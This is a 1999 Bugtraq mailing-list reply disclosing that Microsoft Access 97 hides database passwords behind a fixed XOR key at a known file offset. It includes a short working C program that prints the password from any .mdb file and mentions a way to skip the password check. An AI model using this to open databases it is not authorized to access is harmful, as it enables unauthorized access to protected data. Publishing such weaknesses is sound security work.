[9450] in bugtraq
Re: Microsoft Access 97 Stores Database Password as Plaintext
daemon@ATHENA.MIT.EDU (Jim Paris)
Tue Feb 9 19:07:08 1999
Date: Tue, 9 Feb 1999 17:46:27 -0500
Reply-To: Jim Paris <jim@JTAN.COM>
From: Jim Paris <jim@JTAN.COM>
X-To: milton@ISOMEDIA.COM
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To: <000d01be53aa$d42df540$dbdc95cf@isomedia.com> from "Stephen M.
Milton" at Feb 8, 99 01:34:38 pm
> The following text was posted to USENET, and indexed on a Russian cypherpunk
> site. I found it when I was doing some work with Access 97 databses. I
> think you will agree that this particular "feature" makes the linked
> database password issue moot.
Most definately!
> > Anyway, Access97 passwords are stored in the 13 bytes from offset
> >0x42 in a .mdb file. Do a bitwise XOR with 0x86, 0xFB, 0xEC, 0x37,
> >0x5D, 0x44, 0x9C, 0xFA, 0xC6, 0x5E, 0x28, 0xE6, 0x13 to recover the
> >plaintext. I think that if the first byte is 0x86, the password is
> >not checked.
Minor correction: the passwords can be a maximum of 14 bytes. The last
XOR value is 0xD8. Here's a quick program to test this lack of
security:
/* snip here */
#include <stdio.h>
#include <stdlib.h>
int main(int argc, char *argv[])
{
FILE *mdb; int i; char ch;
int secret[14]={
0x86,0xFB,0xEC,0x37,
0x5D,0x44,0x9C,0xFA,
0xC6,0x5E,0x28,0xE6,
0x13,0xD8
};
if(argc<2) {
fprintf(stderr,"usage: %s filename.mdb\n",argv[0]);
return 1;
}
if((mdb=fopen(argv[1],"rb"))==NULL) {
fprintf(stderr,"%s: can't open %s\n",argv[0],argv[1]);
return 1;
}
fseek(mdb,0x42,SEEK_SET);
printf("The password is: ");
for(i=0;i<14;i++)
{
if((ch=fgetc(mdb)^secret[i])==0) break;
putchar(ch);
}
if(i==0) printf("(none)");
putchar('\n');
fclose(mdb);
return 0;
}
/* snip here */
-jim
